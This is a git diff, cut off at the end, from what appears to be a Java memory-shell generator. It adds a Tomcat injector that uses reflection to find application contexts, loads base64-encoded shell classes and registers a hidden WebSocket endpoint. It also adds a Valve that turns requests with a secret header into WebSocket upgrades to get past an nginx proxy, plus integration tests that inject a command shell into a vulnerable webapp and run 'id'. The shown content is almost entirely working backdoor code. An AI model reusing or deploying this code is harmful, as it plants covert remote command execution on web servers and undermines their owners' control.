diff --git a/boot/src/main/java/com/reajason/javaweb/boot/dto/MemShellGenerateRequest.java b/boot/src/main/java/com/reajason/javaweb/boot/dto/MemShellGenerateRequest.java index 419cd67e..69e7647a 100644 --- a/boot/src/main/java/com/reajason/javaweb/boot/dto/MemShellGenerateRequest.java +++ b/boot/src/main/java/com/reajason/javaweb/boot/dto/MemShellGenerateRequest.java @@ -51,6 +51,8 @@ public class MemShellGenerateRequest { case Command -> CommandConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) .paramName(shellToolConfig.getCommandParamName()) + .headerName(shellToolConfig.getHeaderName()) + .headerValue(shellToolConfig.getHeaderValue()) .template(shellToolConfig.getCommandTemplate()) .encryptor(CommandConfig.Encryptor.fromString(shellToolConfig.getEncryptor())) .implementationClass(CommandConfig.ImplementationClass.fromString(shellToolConfig.getImplementationClass())) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java index 520d8dae..32600cc5 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java @@ -5,6 +5,7 @@ import com.reajason.javaweb.memshell.config.InjectorConfig; import com.reajason.javaweb.memshell.config.ShellConfig; import com.reajason.javaweb.memshell.config.ShellToolConfig; import com.reajason.javaweb.memshell.generator.InjectorGenerator; +import com.reajason.javaweb.memshell.generator.WebSocketByPassHelperGenerator; import com.reajason.javaweb.memshell.server.AbstractServer; import com.reajason.javaweb.probe.ProbeContent; import com.reajason.javaweb.probe.ProbeMethod; @@ -63,6 +64,11 @@ public class MemShellGenerator { injectorConfig.setShellClassName(shellToolConfig.getShellClassName()); injectorConfig.setShellClassBytes(shellBytes); + if (ShellType.BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType()) + || ShellType.JAKARTA_BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())) { + injectorConfig.setHelperClassBytes(WebSocketByPassHelperGenerator.getBytes(shellConfig, shellToolConfig)); + } + InjectorGenerator injectorGenerator = new InjectorGenerator(shellConfig, injectorConfig); byte[] injectorBytes = injectorGenerator.generate(); if (shellConfig.isProbe() && !shellConfig.getShellType().startsWith(ShellType.AGENT)) { diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/ServerFactory.java b/generator/src/main/java/com/reajason/javaweb/memshell/ServerFactory.java index d2e2a810..596457d0 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/ServerFactory.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/ServerFactory.java @@ -60,6 +60,8 @@ public class ServerFactory { .addShellClass(JAKARTA_PROXY_VALVE, Godzilla.class) .addShellClass(WEBSOCKET, GodzillaWebSocket.class) .addShellClass(JAKARTA_WEBSOCKET, GodzillaWebSocket.class) + .addShellClass(BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class) + .addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class) .addShellClass(SPRING_WEBMVC_INTERCEPTOR, GodzillaInterceptor.class) .addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, GodzillaInterceptor.class) .addShellClass(SPRING_WEBMVC_CONTROLLER_HANDLER, GodzillaControllerHandler.class) @@ -137,6 +139,8 @@ public class ServerFactory { .addShellClass(JAKARTA_PROXY_VALVE, Command.class) .addShellClass(WEBSOCKET, CommandWebSocket.class) .addShellClass(JAKARTA_WEBSOCKET, CommandWebSocket.class) + .addShellClass(BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class) + .addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class) .addShellClass(UPGRADE, CommandUpgrade.class) .addShellClass(SPRING_WEBMVC_INTERCEPTOR, CommandInterceptor.class) .addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, CommandInterceptor.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/ShellType.java b/generator/src/main/java/com/reajason/javaweb/memshell/ShellType.java index f01163af..487eff1a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/ShellType.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/ShellType.java @@ -45,7 +45,9 @@ public class ShellType { public static final String SPRING_WEBFLUX_HANDLER_METHOD = "HandlerMethod"; public static final String SPRING_WEBFLUX_HANDLER_FUNCTION = "HandlerFunction"; public static final String WEBSOCKET = "WebSocket"; + public static final String BYPASS_NGINX_WEBSOCKET = "BypassNginx" + WEBSOCKET; public static final String JAKARTA_WEBSOCKET = "JakartaWebSocket"; + public static final String JAKARTA_BYPASS_NGINX_WEBSOCKET = "JakartaWebBypassNginx" + WEBSOCKET; public static final String ACTION = "Action"; } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java index bbcbda2d..33a49539 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java @@ -22,6 +22,18 @@ public class CommandConfig extends ShellToolConfig { @Builder.Default private String paramName = CommonUtil.getRandomString(8); + /** + * 只有在 WebSocket Bypass 的时候才有用,防止对业务的干扰 + */ + @Builder.Default + private String headerName = "User-Agent"; + + /** + * 只有在 WebSocket Bypass 的时候才有用,防止对业务的干扰 + */ + @Builder.Default + private String headerValue = CommonUtil.getRandomString(8); + /** * 加密器 */ @@ -48,6 +60,22 @@ public class CommandConfig extends ShellToolConfig { } return self(); } + + public B headerName(final String headerName) { + if (StringUtils.isNotBlank(headerName)) { + this.headerName$value = headerName; + headerName$set = true; + } + return self(); + } + + public B headerValue(final String headerValue) { + if (StringUtils.isNotBlank(headerValue)) { + this.headerValue$value = headerValue; + headerValue$set = true; + } + return self(); + } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java index 5a85c011..236d83da 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java @@ -16,37 +16,38 @@ import net.bytebuddy.dynamic.DynamicType; @AllArgsConstructor @Builder(toBuilder = true) public class InjectorConfig { - /** - * 注入器 Builder - */ - DynamicType.Builder injectorBuilder; - /** - * 内存马 Builder - */ - DynamicType.Builder shellBuilder; /** * 注入器模板类 */ private Class injectorClass; + /** * 注入器类名 */ @Builder.Default private String injectorClassName = CommonUtil.generateInjectorClassName(); + /** * 注入访问的地址 */ @Builder.Default private String urlPattern = "/*"; + /** * 内存马类名 */ private String shellClassName; + /** * 内存马类字节 */ private byte[] shellClassBytes; + /** + * 辅助类字节码 + */ + private byte[] helperClassBytes; + /** * 添加静态代码块调用构造方法初始化 */ diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java index cd197dd8..3251ed69 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java @@ -49,6 +49,12 @@ public class InjectorGenerator { .method(named("getBase64String")).intercept(FixedValue.value(base64String)) .method(named("getClassName")).intercept(FixedValue.value(injectorConfig.getShellClassName())); + byte[] helperClassBytes = injectorConfig.getHelperClassBytes(); + if (helperClassBytes != null) { + String helperBase64 = Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(helperClassBytes)); + builder = builder.method(named("getHelperBase64String")).intercept(FixedValue.value(helperBase64)); + } + if (shellConfig.needByPassJavaModule()) { builder = ByPassJavaModuleInterceptor.extend(builder); } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/WebSocketByPassHelperGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/WebSocketByPassHelperGenerator.java new file mode 100644 index 00000000..54a39dad --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/WebSocketByPassHelperGenerator.java @@ -0,0 +1,56 @@ +package com.reajason.javaweb.memshell.generator; + +import com.reajason.javaweb.ClassBytesShrink; +import com.reajason.javaweb.GenerationException; +import com.reajason.javaweb.Server; +import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper; +import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper; +import com.reajason.javaweb.memshell.config.CommandConfig; +import com.reajason.javaweb.memshell.config.GodzillaConfig; +import com.reajason.javaweb.memshell.config.ShellConfig; +import com.reajason.javaweb.memshell.config.ShellToolConfig; +import com.reajason.javaweb.memshell.shelltool.wsbypass.TomcatWsBypassValve; +import com.reajason.javaweb.utils.CommonUtil; +import net.bytebuddy.ByteBuddy; +import net.bytebuddy.dynamic.DynamicType; +import org.apache.commons.lang3.tuple.Pair; + +import static net.bytebuddy.matcher.ElementMatchers.named; + +/** + * @author ReaJason + * @since 2026/1/13 + */ +public class WebSocketByPassHelperGenerator { + public static byte[] getBytes(ShellConfig shellConfig, ShellToolConfig shellToolConfig) { + Pair headerPair = getHeaderPair(shellToolConfig); + if (headerPair == null) { + throw new GenerationException("unsupported shell config: " + shellConfig.getShellTool()); + } + + if (Server.Tomcat.equals(shellConfig.getServer())) { + DynamicType.Builder builder = new ByteBuddy() + .redefine(TomcatWsBypassValve.class) + .visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion())) + .field(named("headerName")).value(headerPair.getKey()) + .field(named("headerValue")).value(headerPair.getValue()) + .name(CommonUtil.generateClassName()); + if (shellConfig.isJakarta()) { + builder = builder.visit(ServletRenameVisitorWrapper.INSTANCE); + } + try (DynamicType.Unloaded dynamicType = builder.make()) { + return ClassBytesShrink.shrink(dynamicType.getBytes(), shellConfig.isShrink()); + } + } + return null; + } + + private static Pair getHeaderPair(ShellToolConfig shellToolConfig) { + if (shellToolConfig instanceof CommandConfig) { + return Pair.of(((CommandConfig) shellToolConfig).getHeaderName(), ((CommandConfig) shellToolConfig).getHeaderValue()); + } else if (shellToolConfig instanceof GodzillaConfig) { + return Pair.of(((GodzillaConfig) shellToolConfig).getHeaderName(), ((GodzillaConfig) shellToolConfig).getHeaderValue()); + } + return null; + } +} diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketByPassInjector.java b/generator/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketByPassInjector.java new file mode 100644 index 00000000..00ac2b41 --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketByPassInjector.java @@ -0,0 +1,286 @@ +package com.reajason.javaweb.memshell.injector.tomcat; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.PrintStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.*; +import java.util.zip.GZIPInputStream; + +/** + * @author ReaJason + * @since 2026/1/13 + */ +public class TomcatWebSocketByPassInjector { + + private static String msg = ""; + private static boolean ok = false; + + public String getUrlPattern() { + return "{{urlPattern}}"; + } + + public String getClassName() { + return "{{className}}"; + } + + public String getBase64String() { + return "{{base64Str}}"; + } + + public String getHelperBase64String() { + return "{{helperBase64String}}"; + } + + public TomcatWebSocketByPassInjector() { + if (ok) { + return; + } + Set contexts = null; + try { + contexts = getContext(); + } catch (Throwable throwable) { + msg += "context error: " + getErrorMessage(throwable); + } + if (contexts == null || contexts.isEmpty()) { + msg += "context not found"; + } else { + for (Object context : contexts) { + try { + msg += ("context: [" + getContextRoot(context) + "] "); + Object shell = getShell(context); + inject(context, shell); + msg += "[" + getUrlPattern() + "] ready\n"; + } catch (Throwable e) { + msg += "failed " + getErrorMessage(e) + "\n"; + } + } + } + ok = true; + System.out.println(msg); + } + + public Set getContext() throws Exception { + Set contexts = new HashSet(); + Set threads = Thread.getAllStackTraces().keySet(); + for (Thread thread : threads) { + String threadName = thread.getName(); + if (threadName.contains("ContainerBackgroundProcessor")) { + Map childrenMap = (Map) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children"); + for (Object value : childrenMap.values()) { + Map children = (Map) getFieldValue(value, "children"); + contexts.addAll(children.values()); + } + } else if (threadName.contains("Poller") && !threadName.contains("ajp")) { + try { + Object proto = getFieldValue(getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "handler"), "proto"); + Object engine = getFieldValue(getFieldValue(getFieldValue(getFieldValue(proto, "adapter"), "connector"), "service"), "engine"); + Map childrenMap = (Map) getFieldValue(engine, "children"); + for (Object value : childrenMap.values()) { + Map children = (Map) getFieldValue(value, "children"); + contexts.addAll(children.values()); + } + } catch (Exception ignored) { + } + } else if (thread.getContextClassLoader() != null) { + String name = thread.getContextClassLoader().getClass().getSimpleName(); + if (name.matches(".+WebappClassLoader")) { + Object resources = getFieldValue(thread.getContextClassLoader(), "resources"); + // need WebResourceRoot not DirContext + if (resources != null && resources.getClass().getName().endsWith("Root")) { + Object context = getFieldValue(resources, "context"); + contexts.add(context); + } + } + } + } + return contexts; + } + + @SuppressWarnings("all") + private String getContextRoot(Object context) { + String r = null; + try { + r = (String) invokeMethod(invokeMethod(context, "getServletContext", null, null), "getContextPath", null, null); + } catch (Exception ignored) { + } + String c = context.getClass().getName(); + if (r == null) { + return c; + } + if (r.isEmpty()) { + return c + "(/)"; + } + return c + "(" + r + ")"; + } + + private ClassLoader getWebAppClassLoader(Object context) { + try { + return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null)); + } catch (Exception e) { + Object loader = invokeMethod(context, "getLoader", null, null); + return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null)); + } + } + + @SuppressWarnings("all") + private Object getShell(Object context) throws Exception { + ClassLoader classLoader = getWebAppClassLoader(context); + Class clazz = null; + try { + clazz = classLoader.loadClass(getClassName()); + } catch (Exception e) { + clazz = defineShell(classLoader, getBase64String()); + } + msg += "[" + classLoader.getClass().getName() + "] "; + return clazz.newInstance(); + } + + private Class defineShell(ClassLoader classLoader, String base64) throws Exception { + byte[] clazzByte = gzipDecompress(decodeBase64(base64)); + Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); + defineClass.setAccessible(true); + return ((Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length)); + } + + + @SuppressWarnings("unchecked") + private void inject(Object context, Object obj) throws Exception { + Object servletContext = invokeMethod(context, "getServletContext", null, null); + Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"}); + if (container == null) { + container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"jakarta.websocket.server.ServerContainer"}); + } + + if (container == null) { + throw new RuntimeException("container is null"); + } + + if (invokeMethod(container, "findMapping", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) { + return; + } + + Object valve = defineShell(context.getClass().getClassLoader(), getHelperBase64String()).newInstance(); + Object pipeline = invokeMethod(context, "getPipeline", null, null); + Class valveClass = context.getClass().getClassLoader().loadClass("org.apache.catalina.Valve"); + invokeMethod(pipeline, "addValve", new Class[]{valveClass}, new Object[]{valve}); + + ClassLoader contextClassLoader = context.getClass().getClassLoader(); + Class serverEndpointConfigClass; + Class builderClass; + try { + serverEndpointConfigClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig"); + builderClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig$Builder"); + } catch (ClassNotFoundException e) { + serverEndpointConfigClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig"); + builderClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig$Builder"); + } + Constructor constructor = builderClass.getDeclaredConstructor(Class.class, String.class); + constructor.setAccessible(true); + Object o1 = constructor.newInstance(obj.getClass(), getUrlPattern()); + Object endpointConfig = invokeMethod(o1, "build", null, null); + + invokeMethod(container, "setDefaultMaxTextMessageBufferSize", new Class[]{int.class}, new Object[]{52428800}); + invokeMethod(container, "setDefaultMaxBinaryMessageBufferSize", new Class[]{int.class}, new Object[]{52428800}); + invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig}); + } + + @Override + public String toString() { + return msg; + } + + @SuppressWarnings("all") + public static byte[] decodeBase64(String base64Str) throws Exception { + Class decoderClass; + try { + decoderClass = Class.forName("java.util.Base64"); + Object decoder = decoderClass.getMethod("getDecoder").invoke(null); + return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str); + } catch (Exception ignored) { + decoderClass = Class.forName("sun.misc.BASE64Decoder"); + return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str); + } + } + + @SuppressWarnings("all") + public static byte[] gzipDecompress(byte[] compressedData) throws IOException { + ByteArrayOutputStream out = new ByteArrayOutputStream(); + GZIPInputStream gzipInputStream = null; + try { + gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData)); + byte[] buffer = new byte[4096]; + int n; + while ((n = gzipInputStream.read(buffer)) > 0) { + out.write(buffer, 0, n); + } + return out.toByteArray(); + } finally { + if (gzipInputStream != null) { + gzipInputStream.close(); + } + out.close(); + } + } + + + @SuppressWarnings("all") + public static Object invokeMethod(Object obj, String methodName, Class[] paramClazz, Object[] param) { + try { + Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass(); + Method method = null; + while (clazz != null && method == null) { + try { + if (paramClazz == null) { + method = clazz.getDeclaredMethod(methodName); + } else { + method = clazz.getDeclaredMethod(methodName, paramClazz); + } + } catch (NoSuchMethodException e) { + clazz = clazz.getSuperclass(); + } + } + if (method == null) { + throw new NoSuchMethodException("Method not found: " + methodName); + } + method.setAccessible(true); + return method.invoke(obj instanceof Class ? null : obj, param); + } catch (Exception e) { + throw new RuntimeException("Error invoking method: " + methodName, e); + } + } + + + @SuppressWarnings("all") + public static Object getFieldValue(Object obj, String name) throws Exception { + Class clazz = obj.getClass(); + while (clazz != Object.class) { + try { + Field field = clazz.getDeclaredField(name); + field.setAccessible(true); + return field.get(obj); + } catch (NoSuchFieldException var5) { + clazz = clazz.getSuperclass(); + } + } + throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name); + } + + @SuppressWarnings("all") + private String getErrorMessage(Throwable throwable) { + PrintStream printStream = null; + try { + ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); + printStream = new PrintStream(outputStream); + throwable.printStackTrace(printStream); + return outputStream.toString(); + } finally { + if (printStream != null) { + printStream.close(); + } + } + } +} diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/Tomcat.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/Tomcat.java index 766c2845..33e4c71f 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/Tomcat.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/Tomcat.java @@ -46,6 +46,8 @@ public class Tomcat extends AbstractServer { .addInjector(CATALINA_AGENT_CONTEXT_VALVE, TomcatContextValveAgentInjector.class) .addInjector(WEBSOCKET, TomcatWebSocketInjector.class) .addInjector(JAKARTA_WEBSOCKET, TomcatWebSocketInjector.class) + .addInjector(BYPASS_NGINX_WEBSOCKET, TomcatWebSocketByPassInjector.class) + .addInjector(JAKARTA_BYPASS_NGINX_WEBSOCKET, TomcatWebSocketByPassInjector.class) .addInjector(UPGRADE, TomcatUpgradeInjector.class) .build(); } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/shelltool/wsbypass/TomcatWsBypassValve.java b/generator/src/main/java/com/reajason/javaweb/memshell/shelltool/wsbypass/TomcatWsBypassValve.java new file mode 100644 index 00000000..94041888 --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/shelltool/wsbypass/TomcatWsBypassValve.java @@ -0,0 +1,99 @@ +package com.reajason.javaweb.memshell.shelltool.wsbypass; + +import org.apache.catalina.Valve; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.Response; + +import javax.servlet.ServletException; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.Method; + +/** + * @author ReaJason + * @since 2026/1/13 + */ +public class TomcatWsBypassValve implements Valve { + public static String headerName; + public static String headerValue; + + @Override + public void invoke(Request request, Response response) throws IOException, ServletException { + try { + if (request.getHeader(headerName) != null + && request.getHeader(headerName).contains(headerValue)) { + String pathInfo = request.getPathInfo(); + String path; + if (pathInfo == null) { + path = request.getServletPath(); + } else { + path = request.getServletPath() + pathInfo; + } + Object sc = request.getServletContext().getAttribute("javax.websocket.server.ServerContainer"); + if (sc == null) { + sc = request.getServletContext().getAttribute("jakarta.websocket.server.ServerContainer"); + } + if (sc == null) { + throw new ServletException("Server container not found"); + } + addHeader(request, "Connection", "upgrade"); + addHeader(request, "Sec-WebSocket-Version", "13"); + addHeader(request, "Upgrade", "websocket"); + Object mappingResult = sc.getClass().getMethod("findMapping", String.class).invoke(sc, path); + Class upgradeUtil = Class.forName("org.apache.tomcat.websocket.server.UpgradeUtil"); + for (Method method : upgradeUtil.getMethods()) { + if ("doUpgrade".equals(method.getName())) { + method.invoke(null, sc, request, response, getFieldValue(mappingResult, "config"), getFieldValue(mappingResult, "pathParams")); + } + } + return; + } + } catch (Throwable e) { + e.printStackTrace(); + } + this.getNext().invoke(request, response); + } + + private Object getFieldValue(Object obj, String fieldName) throws Exception { + Field declaredField = obj.getClass().getDeclaredField(fieldName); + declaredField.setAccessible(true); + return declaredField.get(obj); + } + + private void addHeader(Request request, String key, String value) { + try { + Field coyoteRequestField = request.getClass().getDeclaredField("coyoteRequest"); + coyoteRequestField.setAccessible(true); + Object coyoteRequest = coyoteRequestField.get(request); + Method getMimeHeadersMethod = coyoteRequest.getClass().getMethod("getMimeHeaders"); + Object mimeHeaders = getMimeHeadersMethod.invoke(coyoteRequest); + Method addValueMethod = mimeHeaders.getClass().getMethod("addValue", String.class); + Object messageBytes = addValueMethod.invoke(mimeHeaders, key); + Method setStringMethod = messageBytes.getClass().getMethod("setString", String.class); + setStringMethod.invoke(messageBytes, value); + } catch (Exception e) { + e.printStackTrace(); + } + } + + Valve next; + + @Override + public Valve getNext() { + return this.next; + } + + @Override + public void setNext(Valve valve) { + this.next = valve; + } + + @Override + public boolean isAsyncSupported() { + return false; + } + + @Override + public void backgroundProcess() { + } +} diff --git a/integration-test/docker-compose/tomcat/docker-compose-10.1-jre11-nginx.yaml b/integration-test/docker-compose/tomcat/docker-compose-10.1-jre11-nginx.yaml new file mode 100644 index 00000000..79b6f8d0 --- /dev/null +++ b/integration-test/docker-compose/tomcat/docker-compose-10.1-jre11-nginx.yaml @@ -0,0 +1,13 @@ +services: + tomcat: + image: tomcat:10.1-jre11 + volumes: + - ../../../vul/vul-webapp-jakarta/build/libs/vul-webapp-jakarta.war:/usr/local/tomcat/webapps/app.war + nginx: + image: nginx:latest + ports: + - "80:80" + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf:ro + depends_on: + - tomcat \ No newline at end of file diff --git a/integration-test/docker-compose/tomcat/docker-compose-8-jre8-nginx.yaml b/integration-test/docker-compose/tomcat/docker-compose-8-jre8-nginx.yaml new file mode 100644 index 00000000..ae01e26c --- /dev/null +++ b/integration-test/docker-compose/tomcat/docker-compose-8-jre8-nginx.yaml @@ -0,0 +1,13 @@ +services: + tomcat: + image: tomcat:8-jre8 + volumes: + - ../../../vul/vul-webapp/build/libs/vul-webapp.war:/usr/local/tomcat/webapps/app.war + nginx: + image: nginx:latest + ports: + - "80:80" + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf:ro + depends_on: + - tomcat \ No newline at end of file diff --git a/integration-test/docker-compose/tomcat/nginx.conf b/integration-test/docker-compose/tomcat/nginx.conf new file mode 100644 index 00000000..f7a34420 --- /dev/null +++ b/integration-test/docker-compose/tomcat/nginx.conf @@ -0,0 +1,58 @@ +user nginx; +worker_processes auto; + +error_log /var/log/nginx/error.log notice; +pid /var/run/nginx.pid; + +events { + worker_connections 1024; +} + +http { + include /etc/nginx/mime.types; + default_type application/octet-stream; + + log_format main '$remote_addr - $remote_user [$time_local] "$request" ' + '$status $body_bytes_sent "$http_referer" ' + '"$http_user_agent" "$http_x_forwarded_for"'; + + access_log /var/log/nginx/access.log main; + + sendfile on; + tcp_nopush on; + keepalive_timeout 65; + gzip on; + + upstream tomcat_backend { + server tomcat:8080; + } + + server { + listen 80; + server_name localhost; + access_log /var/log/nginx/tomcat_access.log; + error_log /var/log/nginx/tomcat_error.log; + client_max_body_size 50M; + + location / { + proxy_pass http://tomcat_backend; + + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_connect_timeout 60s; + proxy_send_timeout 60s; + proxy_read_timeout 60s; + proxy_buffering on; + proxy_buffer_size 4k; + proxy_buffers 8 4k; + proxy_busy_buffers_size 8k; + } + + error_page 500 502 503 504 /50x.html; + location = /50x.html { + root /usr/share/nginx/html; + } + } +} \ No newline at end of file diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8WebSocketBypassNginxTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8WebSocketBypassNginxTest.java new file mode 100644 index 00000000..5780624e --- /dev/null +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8WebSocketBypassNginxTest.java @@ -0,0 +1,73 @@ +package com.reajason.javaweb.integration.memshell.tomcat; + +import com.reajason.javaweb.godzilla.BlockingJavaWebSocketClient; +import com.reajason.javaweb.integration.ShellAssertion; +import com.reajason.javaweb.memshell.MemShellResult; +import com.reajason.javaweb.memshell.ServerType; +import com.reajason.javaweb.memshell.ShellTool; +import com.reajason.javaweb.memshell.ShellType; +import com.reajason.javaweb.memshell.config.CommandConfig; +import com.reajason.javaweb.memshell.config.ShellToolConfig; +import com.reajason.javaweb.packer.Packers; +import lombok.extern.slf4j.Slf4j; +import org.apache.commons.lang3.tuple.Pair; +import org.junit.jupiter.api.AfterAll; +import org.junit.jupiter.api.Test; +import org.objectweb.asm.Opcodes; +import org.testcontainers.containers.ComposeContainer; +import org.testcontainers.containers.wait.strategy.Wait; +import org.testcontainers.junit.jupiter.Container; +import org.testcontainers.junit.jupiter.Testcontainers; + +import java.io.File; + +import static org.junit.jupiter.api.Assertions.assertThrows; +import static org.junit.jupiter.api.Assertions.assertTrue; + +/** + * @author ReaJason + * @since 2026/1/13 + */ +@Testcontainers +@Slf4j +public class Tomcat8WebSocketBypassNginxTest { + + public static final String imageName = "tomcat:8-jre8"; + + @Container + public static final ComposeContainer compose = + new ComposeContainer(new File("docker-compose/tomcat/docker-compose-8-jre8-nginx.yaml")) + .withExposedService("tomcat", 8080, Wait.forHttp("/app/")) + .withExposedService("nginx", 80); + + public static String getUrl() { + String host = compose.getServiceHost("nginx", 80); + int port = compose.getServicePort("nginx", 80); + String url = "http://" + host + ":" + port + "/app"; + log.info("container started, app url is : {}", url); + return url; + } + + @Test + public void testWs() { + String url = getUrl(); + String server = ServerType.TOMCAT; + String serverVersion = "Unknown"; + int targetJdkVersion = Opcodes.V1_8; + String shellType = ShellType.BYPASS_NGINX_WEBSOCKET; + String shellTool = ShellTool.Command; + Packers packer = Packers.Base64; + Pair urls = ShellAssertion.getUrls(url, shellType, shellTool, packer); + String shellUrl = urls.getLeft(); + String urlPattern = urls.getRight(); + ShellToolConfig shellToolConfig = ShellAssertion.getShellToolConfig(shellType, shellTool, packer); + MemShellResult generateResult = ShellAssertion.generate(urlPattern, server, serverVersion, shellType, shellTool, targetJdkVersion, shellToolConfig, packer); + ShellAssertion.packerResultAndInject(generateResult, url, shellTool, shellType, packer, null); + CommandConfig commandConfig = (CommandConfig) generateResult.getShellToolConfig(); + // direct connect ws will cause failed + assertThrows(IllegalStateException.class, () -> BlockingJavaWebSocketClient.sendRequestWaitResponse(shellUrl, "id"), "WebSocket connection is not open."); + // connect by valve bypass will success + String response = BlockingJavaWebSocketClient.sendRequestWaitResponseWithHeader(shellUrl, "id", commandConfig.getHeaderName(), commandConfig.getHeaderValue()); + assertTrue(response.contains("uid=")); + } +} diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/tomcat10WebSocketBypassNginxTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/tomcat10WebSocketBypassNginxTest.java new file mode 100644 index 00000000..e842fdc1 --- /dev/null +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/tomcat10WebSocketBypassNginxTest.java @@ -0,0 +1,73 @@ +package com.reajason.javaweb.integration.memshell.tomcat; + +import com.reajason.javaweb.godzilla.BlockingJavaWebSocketClient; +import com.reajason.javaweb.integration.ShellAssertion; +import com.reajason.javaweb.memshell.MemShellResult; +import com.reajason.javaweb.memshell.ServerType; +import com.reajason.javaweb.memshell.ShellTool; +import com.reajason.javaweb.memshell.ShellType; +import com.reajason.javaweb.memshell.config.CommandConfig; +import com.reajason.javaweb.memshell.config.ShellToolConfig; +import com.reajason.javaweb.packer.Packers; +import lombok.extern.slf4j.Slf4j; +import org.apache.commons.lang3.tuple.Pair; +import org.junit.jupiter.api.AfterAll; +import org.junit.jupiter.api.Test; +import org.objectweb.asm.Opcodes; +import org.testcontainers.containers.ComposeContainer; +import org.testcontainers.containers.wait.strategy.Wait; +import org.testcontainers.junit.jupiter.Container; +import org.testcontainers.junit.jupiter.Testcontainers; + +import java.io.File; + +import static org.junit.jupiter.api.Assertions.assertThrows; +import static 